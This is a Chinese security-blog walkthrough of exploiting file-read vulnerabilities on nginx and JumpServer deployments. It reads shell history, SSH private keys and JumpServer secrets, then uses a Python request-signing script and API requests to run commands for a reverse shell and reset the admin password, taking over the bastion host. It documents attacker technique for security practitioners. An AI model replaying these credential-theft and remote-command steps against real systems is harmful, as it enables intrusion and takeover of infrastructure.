文件读取漏洞实战利用

WIN哥学安全 2025-01-03 06:50

点击上方蓝字关注我们  申明：文章仅供技术交流，请自觉遵守网络安全相关法律法规，切勿利用文章内的相关技术从事非法活动，如因此产生的一切不良后果与文章作者无关。

本文由subjcw师傅发表在奇安信攻防社区

文章地址：https://forum.butian.net/share/4017

Nginx配置文件利用

第一处文件读取，严格来讲是SSRF（CVE-2021-27905），不过java环境下的SSRF利用有限，端口也只开放了443

读取/root/.bash_history

翻历史命令发现这台主机上有tomcat和nginx，tomcat也没办法利用，于是把目光转向nginx

读取nginx配置文件，获取了多个URL路由信息，分别对应不同的接口或应用

其中有一个管理后台，通过XFF来过滤请求

添加XFF字段，访问到管理后台，弱口令拿下

Jumpserver AccessKey利用

第二个依旧是nginx的场景，多个域名解析到同一个IP，根据域名分发到不同的后端服务。

读取/root/.bash_history
，历史命令比较多，能看出来是经常使用的，还有多个ssh的公私钥

拼接路径，拿到SSH公私钥

读取/root/.ssh/authorized_keys
可以发现获取到的公私钥与目标服务器的公钥匹配

尝试SSH直接登陆。多地ping了一下发现不是CDN，对目标的IP全端口扫描，发现SSH开在一个高端口，但是很遗憾登不上。这个SSH是Nginx服务器的，并不是漏洞所在的服务器。

但是刚刚读authorized_keys
和history
的时候发现目标服务器部署了jumpserver
，并且自身在jumpserver
的管理范围内。

查看收集到的资产，确实有一个jumpserver相关域名，解析IP与当前目标服务器为同一IP。现在就看能否获取jumpserver
控制台权限。

读取jumpserver配置文件/opt/jumpserver/config/config.txt
，可以获取一些敏感信息如数据库、redis密码，但是jumpserver是容器化部署，没办法直接连上。

除此之外就是SECRET_KEY
和BOOTSTRAP_TOKEN

看一下jumpserver
官方文档中的说明

参数说明 – JumpServer 文档

（https://docs.jumpserver.org/zh/master/admin-guide/env/）

SECRET_KEY=****           # 用来加密解密的 KEY
BOOTSTRAP_TOKEN=****      # koko/lion 用来向jms注册使用的 token
ACCESS_KEY_FILE=data/keys/.access_key  # ACCESS KEY 保存的地址, 默认注册后会保存到该文件中

获取之后可以通过脚本调用接口

jumpserver在jms_core
容器中提供了命令行工具用于管理员管理用户，可以修改密码、清除MFA，也就是说只要获取jms_core
容器权限，就可以重置Web管理员密码

看一下python示例，通过使用KeyID和SecretID对请求方法、URL、accept、date进行签名。

import requests, datetime, json
from httpsig.requests_auth import HTTPSignatureAuth
def get_auth(KeyID, SecretID):
    signature_headers = ['(request-target)', 'accept', 'date']
    auth = HTTPSignatureAuth(key_id=KeyID, secret=SecretID, algorithm='hmac-sha256', headers=signature_headers)
    return auth
response = requests.get(url, auth=auth, headers=headers)

也就是说，只要保持请求方法、URL、accept、date不变，签名是可以重用的，可以简单写个python脚本获取sign，将burp作为上级代理捕获数据包后再手动调试数据包

JMS_URL = '' 
X_JMS_ORG = ''
KEY_ID = ''
SECRET_ID = ''
headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': X_JMS_ORG,
        'Date': datetime.now(timezone.utc).strftime('%a, %d %b %Y %H:%M:%S GMT')
    }
def get_auth():
    signature_headers = ['(request-target)', 'accept', 'date']
    auth = HTTPSignatureAuth(key_id=KEY_ID, secret=SECRET_ID, algorithm='hmac-sha256', headers=signature_headers)
    return auth
def get_request(url):
    auth = get_auth()
    full_url = f"{JMS_URL}{url}"
    print(full_url)
    response = requests.get(full_url, auth=auth, headers=headers, verify=False)
    response = requests.post(full_url, auth=auth, headers=headers, data=None, verify=False)
    print(response.text)

读取jumpserver
的accesskey

获取主机列表，这里可以读取/etc/hostname
确认jumpserver
的主机名，找到对应的主机id

GET /api/v1/assets/assets/?offset\=0&limit\=15&display\=1&draw\=1

反弹shell，返回包中包含执行结果的url/api/v1/ops/celery/task//log/

POST /api/v1/ops/command-executions/ HTTP/2
Host: 
User-Agent: python-requests/2.31.0
Accept: application/json
Date: 
Content-Length: 
Content-Type: application/x-www-form-urlencoded
Authorization: Signature
 
hosts=&run_as=&command=

根据官方文档重置管理员密码，如果存在OTP同样可以通过manage.py进行重置。如果管理员开启了强制OTP，重置之后可以在登录后重新绑定。

user.mfa_level='0'
user.otp_secret_key=''

最后以admin
登录jumpserver
控制台，接管堡垒机。

小结

文件读取漏洞在攻防场景下的影响比较有限，但是可以利用文件读取获取历史命令、私钥文件、配置文件等进一步攻击其他服务，继而获取权限或者数据。

往期推荐

                            [ Web漏洞分析与防范实战丨从"脚本小子"迈向"研究员"的第一步 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502196&idx=1&sn=7192bdc239556ce50cef819e31df6ea7&chksm=c0c86880f7bfe19697e9be71f6dbbcb7d355633a2521e4296f039b3acf567fdd5a86b3df215c&scene=21#wechat_redirect)




                            [ 网安牛马碰见WAF如何凑出漏洞数量？（逻辑漏洞篇） ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502178&idx=1&sn=bd49402624ad97e1d5aac52790c107fe&chksm=c0c86896f7bfe180afe6b190a7956659476256f60cf1d977bae3d49085180c5c2a29c44cc5a9&scene=21#wechat_redirect)




                            [ 无线摄像头渗透测试下 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502164&idx=1&sn=dc6fd577f5c4a76d548afcdfeaddd256&chksm=c0c868a0f7bfe1b66328a663207e03369a88c353f7566181c66a470d7e17349e627a4884a39a&scene=21#wechat_redirect)




                            [ 【SRC】未授权访问漏洞引发的惨案....... ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502158&idx=1&sn=b7dea73e6af39dee17845a15008c708c&chksm=c0c868baf7bfe1ac09e8ac845605df357872ec8937297746e99a137a45f552fcd42ebe22ebc6&scene=21#wechat_redirect)




                            [ 通达OA前台任意用户登录漏洞复现 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502156&idx=1&sn=cc30c475e09a2575e9491af256657f77&chksm=c0c868b8f7bfe1ae608b0f16e683f9b7cbac67cf2309f1cf1b2eaebd320faa2662a5eede2ad2&scene=21#wechat_redirect)




                            [ 几个常见的越权漏洞挖掘案例 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502149&idx=1&sn=ee01e77e7d3727aaeb827ef5d41f4467&chksm=c0c868b1f7bfe1a7811b60bea0916bb33a859945682bd72a7860944126802fe7c992612b834c&scene=21#wechat_redirect)




                            [ 12年来最严重的 WordPress 漏洞，可大规模接管管理员权限 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502147&idx=1&sn=6d2c1227899943ee29dc7f1a17b1cf53&chksm=c0c868b7f7bfe1a17c97d31e7cc9145d2ee5475356d4560be1cb0d8c42700331afcc9307ef62&scene=21#wechat_redirect)




                            [ 比较有意思的几个漏洞挖掘记录 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502125&idx=1&sn=15f4d48305c47b6a699973c871f1cca0&chksm=c0c868d9f7bfe1cf87cd0eea2b0fe635af7c9ff29d604544b162d17cad57ab3da3ceb45a0b03&scene=21#wechat_redirect)




                            [ 分享某单位众测项目漏洞挖掘中的一些手法 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502084&idx=1&sn=d48d54097881a0bd3c994c3d816bb50b&chksm=c0c868f0f7bfe1e617bd8b582860051b3a23f3f7b281943bde2953d490765b13d216d6b3ea50&scene=21#wechat_redirect)




                            [ 从404到RCE，挖洞像喝水一样简单 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501990&idx=1&sn=cb10031d31e76ad2a3161edd1b0ae150&chksm=c0c86952f7bfe044a7ca1c516fc7f3622935eb3465254d668faa81f2f08b7bc834755788c98b&scene=21#wechat_redirect)




                            [ 一款针对Burp Suite Pro的安全扫描增强工具 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501958&idx=1&sn=c379d63c4be459123cee9b08089e522a&chksm=c0c86972f7bfe064ca6a3367bb823295789d0c298c46bc7a9f7b50985036ed396b238a86629b&scene=21#wechat_redirect)




                            [ DudeSuite Web Security Tools 渗透测试工具集 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501938&idx=1&sn=e1a7953ca4719b400b2dd6011482996d&chksm=c0c86986f7bfe09019b5e8608ff79a6fe1e44dcd4b6a9acadd57d09ef84b615abf2c12139c2a&scene=21#wechat_redirect)




                            [ 无影(TscanPlus) v2.6发布：弱口令连接校验 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501910&idx=1&sn=48bb76542e5a88c3fbd623fe387e32f5&chksm=c0c869a2f7bfe0b45c85c623f9a521ff19b006449f832d3799c39abae03daaac3471e77c8f26&scene=21#wechat_redirect)




                            [ 一次看个爽——攻防演练合集篇 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501889&idx=1&sn=750feacfaa2b710f1fda9c266efc5098&chksm=c0c869b5f7bfe0a331c351f54e8adcefdcbbe45a157989e9321fb7af86ae5ab8ecede810edff&scene=21#wechat_redirect)




                            [ 小记一次逆向分析 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501882&idx=1&sn=f81013e8a09e890275367a7efe7e8fdc&chksm=c0c869cef7bfe0d81b92a28f2e98af26c8dd45ff5475e58317f93792b423f51cc3786bd50aed&scene=21#wechat_redirect)




                            [ 红队武器库2.0版本，内含数百款渗透工具 ](http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247501849&idx=1&sn=cfa9166999f9242eaac57c9a74b46b74&chksm=c0c869edf7bfe0fb821f3117f5d519e02bc681ee7448562f2164dec9bc430af66fb807ff6584&scene=21#wechat_redirect)

点个
在看你最好看